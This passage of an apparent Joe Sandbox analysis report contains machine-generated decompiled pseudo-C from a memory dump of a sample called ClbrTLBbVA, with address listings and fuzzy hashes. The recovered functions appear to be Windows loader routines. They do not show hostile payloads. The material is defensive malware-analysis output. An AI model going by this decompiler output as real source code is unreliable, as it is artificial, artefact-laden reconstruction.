                                        																					L83:
                                        																					__eflags = _t371;
                                        																					if(_t371 != 0) {
                                        																						_v80 = _t371 - _t356 + _t290;
                                        																						_t310 = _v64;
                                        																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                                        																						_t292 =  *(_t310 + 6) & 0x0000ffff;
                                        																						_t311 = 0;
                                        																						__eflags = 0;
                                        																						while(1) {
                                        																							_v120 = _t311;
                                        																							_v116 = _t348;
                                        																							__eflags = _t311 - _t292;
                                        																							if(_t311 >= _t292) {
                                        																								goto L143;
                                        																							}
                                        																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
                                        																							__eflags = _t371 - _t359;
                                        																							if(_t371 < _t359) {
                                        																								L98:
                                        																								_t348 = _t348 + 0x28;
                                        																								_t311 = _t311 + 1;
                                        																								continue;
                                        																							} else {
                                        																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                                        																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                                        																									goto L98;
                                        																								} else {
                                        																									__eflags = _t348;
                                        																									if(_t348 == 0) {
                                        																										goto L143;
                                        																									} else {
                                        																										_t218 = _v40;
                                        																										_t312 =  *_t218;
                                        																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                                        																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                                        																											_v100 = _t359;
                                        																											_t360 = _v108;
                                        																											_t372 = L016B8F44(_v108, _t312);
                                        																											__eflags = _t372;
                                        																											if(_t372 == 0) {
                                        																												goto L143;
                                        																											} else {
                                        																												_t290 = _v52;
                                        																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E016E3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                                        																												_t307 = _v72;
                                        																												_t344 = _v76;
                                        																												_t218 = _v40;
                                        																												goto L91;
                                        																											}
                                        																										} else {
                                        																											_t290 = _v52;
                                        																											_t307 = _v72;
                                        																											_t344 = _v76;
                                        																											_t369 = _v80;
                                        																											L91:
                                        																											_t358 = _a4;
                                        																											__eflags = _t358;
                                        																											if(_t358 == 0) {
                                        																												L95:
                                        																												_t308 = _a8;
                                        																												__eflags = _t308;
                                        																												if(_t308 != 0) {
                                        																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
                                        																												}
                                        																												_v8 = 0xfffffffe;
                                        																												_t211 = _v84;
                                        																											} else {
                                        																												_t370 =  *_t218 - _t369 + _t290;
                                        																												 *_t358 = _t370;
                                        																												__eflags = _t370 - _t344;
                                        																												if(_t370 <= _t344) {
                                        																													L149:
                                        																													 *_t358 = 0;
                                        																													goto L150;
                                        																												} else {
                                        																													__eflags = _t307;
                                        																													if(_t307 == 0) {
                                        																														goto L95;
                                        																													} else {
                                        																														__eflags = _t370 - _t344 + _t307;
                                        																														if(_t370 >= _t344 + _t307) {
                                        																															goto L149;
                                        																														} else {
                                        																															goto L95;
                                        																														}
                                        																													}
                                        																												}
                                        																											}
                                        																										}
                                        																									}
                                        																								}
                                        																							}
                                        																							goto L97;
                                        																						}
                                        																					}
                                        																					goto L143;
                                        																				}
                                        																			}
                                        																		}
                                        																	} else {
                                        																		__eflags = _v40 - _t307 + _t344;
                                        																		if(_v40 >= _t307 + _t344) {
                                        																			goto L150;
                                        																		} else {
                                        																			goto L75;
                                        																		}
                                        																	}
                                        																}
                                        															}
                                        														}
                                        														L97:
                                        														 *[fs:0x0] = _v20;
                                        														return _t211;
                                        													}
                                        												}
                                        											}
                                        										}
                                        									} else {
                                        										goto L46;
                                        									}
                                        								}
                                        								goto L151;
                                        							}
                                        							_t288 = _v164;
                                        							_t366 = 0xc0000135;
                                        							goto L41;
                                        						}
                                        					}
                                        				}
                                        				L151:
                                        			}
                                        0x00000000
                                        0x016bdc36
                                        0x016bdc23
                                        0x00000000
                                        0x016bdbff
                                        0x016bdbf1
                                        0x016bdbdf
                                        0x016bdb8f
                                        0x016bdb92
                                        0x016bdb95
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x016bdb95
                                        0x016bdb8d
                                        0x016bdb85
                                        0x016bdb74
                                        0x016bdc9f
                                        0x016bdca2
                                        0x016bdcb0
                                        0x016bdcb0
                                        0x016bdad1
                                        0x0170b4e5
                                        0x0170b4c8
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x016bd831
                                        0x00000000
                                        0x016bd800
                                        0x0170b47f
                                        0x0170b485
                                        0x00000000
                                        0x0170b485
                                        0x016bd665
                                        0x016bd652
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3e99ca6443054b8ede548f5dfda955045c2b170ecf4ae5caac8a40a7d02a3c4d
                                        • Instruction ID: 4b810d5d87e7c5ac0bb62b1503bcbc560983e965816d79429aedb49f3e0e4f8b
                                        • Opcode Fuzzy Hash: 3e99ca6443054b8ede548f5dfda955045c2b170ecf4ae5caac8a40a7d02a3c4d
                                        • Instruction Fuzzy Hash: BEE1B134A0035ACFEB35CF58CC94BF9B7B2BF45318F1541A9E9095B291D730AA86CB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 92%
                                        			E016B849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                                        				void* _t136;
                                        				signed int _t139;
                                        				signed int _t141;
                                        				signed int _t145;
                                        				intOrPtr _t146;
                                        				signed int _t149;
                                        				signed int _t150;
                                        				signed int _t161;
                                        				signed int _t163;
                                        				signed int _t165;
                                        				signed int _t169;
                                        				signed int _t171;
                                        				signed int _t194;
                                        				signed int _t200;
                                        				void* _t201;
                                        				signed int _t204;
                                        				signed int _t206;
                                        				signed int _t210;
                                        				signed int _t214;
                                        				signed int _t215;
                                        				signed int _t218;
                                        				void* _t221;
                                        				signed int _t224;
                                        				signed int _t226;
                                        				intOrPtr _t228;
                                        				signed int _t232;
                                        				signed int _t233;
                                        				signed int _t234;
                                        				void* _t237;
                                        				void* _t238;
                                        
                                        				_t236 = __esi;
                                        				_t235 = __edi;
                                        				_t193 = __ebx;
                                        				_push(0x70);
                                        				_push(0x177f9c0);
                                        				E016FD0E8(__ebx, __edi, __esi);
                                        				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                                        				if( *0x1797b04 == 0) {
                                        					L4:
                                        					goto L5;
                                        				} else {
                                        					_t136 = E016BCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                                        					_t236 = 0;
                                        					if(_t136 < 0) {
                                        						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                                        					}
                                        					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                                        						_t193 =  *( *[fs:0x30] + 0x18);
                                        						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                                        						 *(_t237 - 0x68) = _t236;
                                        						 *(_t237 - 0x6c) = _t236;
                                        						_t235 = _t236;
                                        						 *(_t237 - 0x60) = _t236;
                                        						E016C2280( *[fs:0x30], 0x1798550);
                                        						_t139 =  *0x1797b04; // 0x1
                                        						__eflags = _t139 - 1;
                                        						if(__eflags != 0) {
                                        							_t200 = 0xc;
                                        							_t201 = _t237 - 0x40;
                                        							_t141 = E016DF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                                        							 *(_t237 - 0x44) = _t141;
                                        							__eflags = _t141;
                                        							if(_t141 < 0) {
                                        								L50:
                                        								E016BFFB0(_t193, _t235, 0x1798550);
                                        								L5:
                                        								return E016FD130(_t193, _t235, _t236);
                                        							}
                                        							_push(_t201);
                                        							_t221 = 0x10;
                                        							_t202 =  *(_t237 - 0x40);
                                        							_t145 = E016A1C45( *(_t237 - 0x40), _t221);
                                        							 *(_t237 - 0x44) = _t145;
                                        							__eflags = _t145;
                                        							if(_t145 < 0) {
                                        								goto L50;
                                        							}
                                        							_t146 =  *0x1797b9c; // 0x0
                                        							_t235 = L016C4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                                        							 *(_t237 - 0x60) = _t235;
                                        							__eflags = _t235;
                                        							if(_t235 == 0) {
                                        								_t149 = 0xc0000017;
                                        								 *(_t237 - 0x44) = 0xc0000017;
                                        							} else {
                                        								_t149 =  *(_t237 - 0x44);
                                        							}
                                        							__eflags = _t149;
                                        							if(__eflags >= 0) {
                                        								L8:
                                        								 *(_t237 - 0x64) = _t235;
                                        								_t150 =  *0x1797b10; // 0x0
                                        								 *(_t237 - 0x4c) = _t150;
                                        								_push(_t237 - 0x74);
                                        								_push(_t237 - 0x39);
                                        								_push(_t237 - 0x58);
                                        								_t193 = E016DA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                                        								 *(_t237 - 0x44) = _t193;
                                        								__eflags = _t193;
                                        								if(_t193 < 0) {
                                        									L30:
                                        									E016BFFB0(_t193, _t235, 0x1798550);
                                        									__eflags = _t235 - _t237 - 0x38;
                                        									if(_t235 != _t237 - 0x38) {
                                        										_t235 =  *(_t237 - 0x48);
                                        										L016C77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                                        									} else {
                                        										_t235 =  *(_t237 - 0x48);
                                        									}
                                        									__eflags =  *(_t237 - 0x6c);
                                        									if( *(_t237 - 0x6c) != 0) {
                                        										L016C77F0(_t235, _t236,  *(_t237 - 0x6c));
                                        									}
                                        									__eflags = _t193;
                                        									if(_t193 >= 0) {
                                        										goto L4;
                                        									} else {
                                        										goto L5;
                                        									}
                                        								}
                                        								_t204 =  *0x1797b04; // 0x1
                                        								 *(_t235 + 8) = _t204;
                                        								__eflags =  *((char*)(_t237 - 0x39));
                                        								if( *((char*)(_t237 - 0x39)) != 0) {
                                        									 *(_t235 + 4) = 1;
                                        									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                                        									_t161 =  *0x1797b10; // 0x0
                                        									 *(_t237 - 0x4c) = _t161;
                                        								} else {
                                        									 *(_t235 + 4) = _t236;
                                        									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                                        								}
                                        								 *((intOrPtr*)(_t237 - 0x54)) = E016E37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                                        								_t224 = _t236;
                                        								 *(_t237 - 0x40) = _t236;
                                        								 *(_t237 - 0x50) = _t236;
                                        								while(1) {
                                        									_t163 =  *(_t235 + 8);
                                        									__eflags = _t224 - _t163;
                                        									if(_t224 >= _t163) {
                                        										break;
                                        									}
                                        									_t228 =  *0x1797b9c; // 0x0
                                        									_t214 = L016C4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                                        									 *(_t237 - 0x78) = _t214;
                                        									__eflags = _t214;
                                        									if(_t214 == 0) {
                                        										L52:
                                        										_t193 = 0xc0000017;
                                        										L19:
                                        										 *(_t237 - 0x44) = _t193;
                                        										L20:
                                        										_t206 =  *(_t237 - 0x40);
                                        										__eflags = _t206;
                                        										if(_t206 == 0) {
                                        											L26:
                                        											__eflags = _t193;
                                        											if(_t193 < 0) {
                                        												E016E37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                                        												__eflags =  *((char*)(_t237 - 0x39));
                                        												if( *((char*)(_t237 - 0x39)) != 0) {
                                        													 *0x1797b10 =  *0x1797b10 - 8;
                                        												}
                                        											} else {
                                        												_t169 =  *(_t237 - 0x68);
                                        												__eflags = _t169;
                                        												if(_t169 != 0) {
                                        													 *0x1797b04 =  *0x1797b04 - _t169;
                                        												}
                                        											}
                                        											__eflags = _t193;
                                        											if(_t193 >= 0) {
                                        												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                                        											}
                                        											goto L30;
                                        										}
                                        										_t226 = _t206 * 0xc;
                                        										__eflags = _t226;
                                        										_t194 =  *(_t237 - 0x48);
                                        										do {
                                        											 *(_t237 - 0x40) = _t206 - 1;
                                        											_t226 = _t226 - 0xc;
                                        											 *(_t237 - 0x4c) = _t226;
                                        											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                                        											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                                        												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                                        												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                                        													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                                        													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                        													__eflags =  *((char*)(_t237 - 0x39));
                                        													if( *((char*)(_t237 - 0x39)) == 0) {
                                        														_t171 = _t210;
                                        													} else {
                                        														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                                        														L016C77F0(_t194, _t236, _t210 - 8);
                                        														_t171 =  *(_t237 - 0x50);
                                        													}
                                        													L48:
                                        													L016C77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                                        													L46:
                                        													_t206 =  *(_t237 - 0x40);
                                        													_t226 =  *(_t237 - 0x4c);
                                        													goto L24;
                                        												}
                                        												 *0x1797b08 =  *0x1797b08 + 1;
                                        												goto L24;
                                        											}
                                        											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                        											__eflags = _t171;
                                        											if(_t171 != 0) {
                                        												__eflags =  *((char*)(_t237 - 0x39));
                                        												if( *((char*)(_t237 - 0x39)) == 0) {
                                        													goto L48;
                                        												}
                                        												E016E57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                                        												goto L46;
                                        											}
                                        											L24:
                                        											__eflags = _t206;
                                        										} while (_t206 != 0);
                                        										_t193 =  *(_t237 - 0x44);
                                        										goto L26;
                                        									}
                                        									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                                        									 *(_t237 - 0x7c) = _t232;
                                        									 *(_t232 - 4) = _t214;
                                        									 *(_t237 - 4) = _t236;
                                        									E016EF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                                        									_t238 = _t238 + 0xc;
                                        									 *(_t237 - 4) = 0xfffffffe;
                                        									_t215 =  *(_t237 - 0x48);
                                        									__eflags = _t193;
                                        									if(_t193 < 0) {
                                        										L016C77F0(_t215, _t236,  *(_t237 - 0x78));
                                        										goto L20;
                                        									}
                                        									__eflags =  *((char*)(_t237 - 0x39));
                                        									if( *((char*)(_t237 - 0x39)) != 0) {
                                        										_t233 = E016DA44B( *(_t237 - 0x4c));
                                        										 *(_t237 - 0x50) = _t233;
                                        										__eflags = _t233;
                                        										if(_t233 == 0) {
                                        											L016C77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                                        											goto L52;
                                        										}
                                        										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                                        										L17:
                                        										_t234 =  *(_t237 - 0x40);
                                        										_t218 = _t234 * 0xc;
                                        										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                                        										 *(_t218 + _t235 + 0x10) = _t236;
                                        										_t224 = _t234 + 1;
                                        										 *(_t237 - 0x40) = _t224;
                                        										 *(_t237 - 0x50) = _t224;
                                        										_t193 =  *(_t237 - 0x44);
                                        										continue;
                                        									}
                                        									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                                        									goto L17;
                                        								}
                                        								 *_t235 = _t236;
                                        								_t165 = 0x10 + _t163 * 0xc;
                                        								__eflags = _t165;
                                        								_push(_t165);
                                        								_push(_t235);
                                        								_push(0x23);
                                        								_push(0xffffffff);
                                        								_t193 = E016E96C0();
                                        								goto L19;
                                        							} else {
                                        								goto L50;
                                        							}
                                        						}
                                        						_t235 = _t237 - 0x38;
                                        						 *(_t237 - 0x60) = _t235;
                                        						goto L8;
                                        					}
                                        					goto L4;
                                        				}
                                        			}

































                                        0x016b8766
                                        0x00000000
                                        0x016b8766
                                        0x01709b70
                                        0x00000000
                                        0x01709b70
                                        0x016b8656
                                        0x016b865a
                                        0x016b865c
                                        0x016b8752
                                        0x016b8756
                                        0x00000000
                                        0x00000000
                                        0x016b875e
                                        0x00000000
                                        0x016b875e
                                        0x016b8662
                                        0x016b8662
                                        0x016b8662
                                        0x016b8666
                                        0x00000000
                                        0x016b8666
                                        0x016b85b7
                                        0x016b85b9
                                        0x016b85bc
                                        0x016b85bf
                                        0x016b85cc
                                        0x016b85d1
                                        0x016b85d4
                                        0x016b85db
                                        0x016b85de
                                        0x016b85e0
                                        0x01709b5f
                                        0x00000000
                                        0x01709b5f
                                        0x016b85e6
                                        0x016b85ea
                                        0x016b86c3
                                        0x016b86c5
                                        0x016b86c8
                                        0x016b86ca
                                        0x01709b16
                                        0x00000000
                                        0x01709b16
                                        0x016b86d6
                                        0x016b85f6
                                        0x016b85f6
                                        0x016b85f9
                                        0x016b8602
                                        0x016b8606
                                        0x016b860a
                                        0x016b860b
                                        0x016b860e
                                        0x016b8611
                                        0x00000000
                                        0x016b8611
                                        0x016b85f3
                                        0x00000000
                                        0x016b85f3
                                        0x016b8619
                                        0x016b861e
                                        0x016b861e
                                        0x016b8621
                                        0x016b8622
                                        0x016b8623
                                        0x016b8625
                                        0x016b862c
                                        0x00000000
                                        0x016b873d
                                        0x00000000
                                        0x016b873d
                                        0x016b8737
                                        0x016b850f
                                        0x016b8512
                                        0x00000000
                                        0x016b8512
                                        0x00000000
                                        0x016b84d6

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c55728b1e822744881686f01291d503a4737bbc2fa11c3c6f4c072fe3a630f84
                                        • Instruction ID: c0880d27e59f72a61b4f2ef0492e669683dbe31338c43db30edb5d6c33755029
                                        • Opcode Fuzzy Hash: c55728b1e822744881686f01291d503a4737bbc2fa11c3c6f4c072fe3a630f84
                                        • Instruction Fuzzy Hash: 63B129B4E00219DFDB25DF99CD84AEDBBBABF48314F10412EE505AB345E770A986CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 67%
                                        			E016D513A(intOrPtr __ecx, void* __edx) {
                                        				signed int _v8;
                                        				signed char _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr _v24;
                                        				char _v28;
                                        				signed int _v32;
                                        				signed int _v36;
                                        				signed int _v40;
                                        				intOrPtr _v44;
                                        				intOrPtr _v48;
                                        				char _v63;
                                        				char _v64;
                                        				signed int _v72;
                                        				signed int _v76;
                                        				signed int _v80;
                                        				signed int _v84;
                                        				signed int _v88;
                                        				signed char* _v92;
                                        				signed int _v100;
                                        				signed int _v104;
                                        				char _v105;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				void* _t157;
                                        				signed int _t159;
                                        				signed int _t160;
                                        				unsigned int* _t161;
                                        				intOrPtr _t165;
                                        				signed int _t172;
                                        				signed char* _t181;
                                        				intOrPtr _t189;
                                        				intOrPtr* _t200;
                                        				signed int _t202;
                                        				signed int _t203;
                                        				char _t204;
                                        				signed int _t207;
                                        				signed int _t208;
                                        				void* _t209;
                                        				intOrPtr _t210;
                                        				signed int _t212;
                                        				signed int _t214;
                                        				signed int _t221;
                                        				signed int _t222;
                                        				signed int _t226;
                                        				intOrPtr* _t232;
                                        				signed int _t233;
                                        				signed int _t234;
                                        				intOrPtr _t237;
                                        				intOrPtr _t238;
                                        				intOrPtr _t240;
                                        				void* _t245;
                                        				signed int _t246;
                                        				signed int _t247;
                                        				void* _t248;
                                        				void* _t251;
                                        				void* _t252;
                                        				signed int _t253;
                                        				signed int _t255;
                                        				signed int _t256;
                                        
                                        				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                                        				_v8 =  *0x179d360 ^ _t255;
                                        				_v32 = _v32 & 0x00000000;
                                        				_t251 = __edx;
                                        				_t237 = __ecx;
                                        				_t212 = 6;
                                        				_t245 =  &_v84;
                                        				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                                        				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                                        				_v48 = __ecx;
                                        				_v36 = _t207;
                                        				_t157 = memset(_t245, 0, _t212 << 2);
                                        				_t256 = _t255 + 0xc;
                                        				_t246 = _t245 + _t212;
                                        				if(_t207 == 2) {
                                        					_t247 =  *(_t237 + 0x60);
                                        					_t208 =  *(_t237 + 0x64);
                                        					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                                        					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                                        					_v104 = _t159;
                                        					_v76 = _t159;
                                        					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                                        					_v100 = _t160;
                                        					_v72 = _t160;
                                        					L19:
                                        					_v80 = _t208;
                                        					_v84 = _t247;
                                        					L8:
                                        					_t214 = 0;
                                        					if( *(_t237 + 0x74) > 0) {
                                        						_t82 = _t237 + 0x84; // 0x124
                                        						_t161 = _t82;
                                        						_v92 = _t161;
                                        						while( *_t161 >> 0x1f != 0) {
                                        							_t200 = _v92;
                                        							if( *_t200 == 0x80000000) {
                                        								break;
                                        							}
                                        							_t214 = _t214 + 1;
                                        							_t161 = _t200 + 0x10;
                                        							_v92 = _t161;
                                        							if(_t214 <  *(_t237 + 0x74)) {
                                        								continue;
                                        							}
                                        							goto L9;
                                        						}
                                        						_v88 = _t214 << 4;
                                        						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                                        						_t165 = 0;
                                        						asm("adc eax, [ecx+edx+0x7c]");
                                        						_v24 = _t165;
                                        						_v28 = _v40;
                                        						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                                        						_t221 = _v40;
                                        						_v16 =  *_v92;
                                        						_v32 =  &_v28;
                                        						if( *(_t237 + 0x4e) >> 0xf == 0) {
                                        							goto L9;
                                        						}
                                        						_t240 = _v48;
                                        						if( *_v92 != 0x80000000) {
                                        							goto L9;
                                        						}
                                        						 *((intOrPtr*)(_t221 + 8)) = 0;
                                        						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                                        						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                                        						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                                        						_t226 = 0;
                                        						_t181 = _t251 + 0x66;
                                        						_v88 = 0;
                                        						_v92 = _t181;
                                        						do {
                                        							if( *((char*)(_t181 - 2)) == 0) {
                                        								goto L31;
                                        							}
                                        							_t226 = _v88;
                                        							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                                        								_t181 = E016ED0F0(1, _t226 + 0x20, 0);
                                        								_t226 = _v40;
                                        								 *(_t226 + 8) = _t181;
                                        								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                                        								L34:
                                        								if(_v44 == 0) {
                                        									goto L9;
                                        								}
                                        								_t210 = _v44;
                                        								_t127 = _t210 + 0x1c; // 0x1c
                                        								_t249 = _t127;
                                        								E016C2280(_t181, _t127);
                                        								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                                        								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                                        								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                                        									L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                                        								}
                                        								_t189 = L016C4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                                        								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                                        								if(_t189 != 0) {
                                        									 *((intOrPtr*)(_t189 + 8)) = _v20;
                                        									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                                        									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                                        									 *_t232 = _t232 + 0x10;
                                        									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                                        									E016EF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                                        									_t256 = _t256 + 0xc;
                                        								}
                                        								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                                        								E016BFFB0(_t210, _t249, _t249);
                                        								_t222 = _v76;
                                        								_t172 = _v80;
                                        								_t208 = _v84;
                                        								_t247 = _v88;
                                        								L10:
                                        								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                                        								_v44 = _t238;
                                        								if(_t238 != 0) {
                                        									 *0x179b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                                        									_v44();
                                        								}
                                        								_pop(_t248);
                                        								_pop(_t252);
                                        								_pop(_t209);
                                        								return E016EB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                                        							}
                                        							_t181 = _v92;
                                        							L31:
                                        							_t226 = _t226 + 1;
                                        							_t181 =  &(_t181[0x18]);
                                        							_v88 = _t226;
                                        							_v92 = _t181;
                                        						} while (_t226 < 4);
                                        						goto L34;
                                        					}
                                        					L9:
                                        					_t172 = _v104;
                                        					_t222 = _v100;
                                        					goto L10;
                                        				}
                                        				_t247 = _t246 | 0xffffffff;
                                        				_t208 = _t247;
                                        				_v84 = _t247;
                                        				_v80 = _t208;
                                        				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                                        					_t233 = _v72;
                                        					_v105 = _v64;
                                        					_t202 = _v76;
                                        				} else {
                                        					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                                        					_v105 = 1;
                                        					if(_v63 <= _t204) {
                                        						_v63 = _t204;
                                        					}
                                        					_t202 = _v76 |  *(_t251 + 0x40);
                                        					_t233 = _v72 |  *(_t251 + 0x44);
                                        					_t247 =  *(_t251 + 0x38);
                                        					_t208 =  *(_t251 + 0x3c);
                                        					_v76 = _t202;
                                        					_v72 = _t233;
                                        					_v84 = _t247;
                                        					_v80 = _t208;
                                        				}
                                        				_v104 = _t202;
                                        				_v100 = _t233;
                                        				if( *((char*)(_t251 + 0xc4)) != 0) {
                                        					_t237 = _v48;
                                        					_v105 = 1;
                                        					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                                        						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                                        						_t237 = _v48;
                                        					}
                                        					_t203 = _t202 |  *(_t251 + 0xb8);
                                        					_t234 = _t233 |  *(_t251 + 0xbc);
                                        					_t247 = _t247 &  *(_t251 + 0xb0);
                                        					_t208 = _t208 &  *(_t251 + 0xb4);
                                        					_v104 = _t203;
                                        					_v76 = _t203;
                                        					_v100 = _t234;
                                        					_v72 = _t234;
                                        					_v84 = _t247;
                                        					_v80 = _t208;
                                        				}
                                        				if(_v105 == 0) {
                                        					_v36 = _v36 & 0x00000000;
                                        					_t208 = 0;
                                        					_t247 = 0;
                                        					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                                        					goto L19;
                                        				} else {
                                        					_v36 = 1;
                                        					goto L8;
                                        				}
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5da73f034bb7f69b936d6d428e1c3eee3d3818f99a12b53729a922afab04d5d6
                                        • Instruction ID: 4d4a95a7a78d2c1d3c37e50c99fad5f0d0906462e120b170c80197ee0efb23bc
                                        • Opcode Fuzzy Hash: 5da73f034bb7f69b936d6d428e1c3eee3d3818f99a12b53729a922afab04d5d6
                                        • Instruction Fuzzy Hash: 27C114755093818FD354CF28C980A6AFBF1BF88704F148A6EF9998B352D771E985CB42
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 74%
                                        			E016D03E2(signed int __ecx, signed int __edx) {
                                        				signed int _v8;
                                        				signed int _v12;
                                        				signed int _v16;
                                        				signed int _v20;
                                        				signed int _v24;
                                        				signed int _v28;
                                        				signed int _v32;
                                        				signed int _v36;
                                        				intOrPtr _v40;
                                        				signed int _v44;
                                        				signed int _v48;
                                        				char _v52;
                                        				char _v56;
                                        				char _v64;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t56;
                                        				signed int _t58;
                                        				char* _t64;
                                        				intOrPtr _t65;
                                        				signed int _t74;
                                        				signed int _t79;
                                        				char* _t83;
                                        				intOrPtr _t84;
                                        				signed int _t93;
                                        				signed int _t94;
                                        				signed char* _t95;
                                        				signed int _t99;
                                        				signed int _t100;
                                        				signed char* _t101;
                                        				signed int _t105;
                                        				signed int _t119;
                                        				signed int _t120;
                                        				void* _t122;
                                        				signed int _t123;
                                        				signed int _t127;
                                        
                                        				_v8 =  *0x179d360 ^ _t127;
                                        				_t119 = __ecx;
                                        				_t105 = __edx;
                                        				_t118 = 0;
                                        				_v20 = __edx;
                                        				_t120 =  *(__ecx + 0x20);
                                        				if(E016D0548(__ecx, 0) != 0) {
                                        					_t56 = 0xc000022d;
                                        					L23:
                                        					return E016EB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
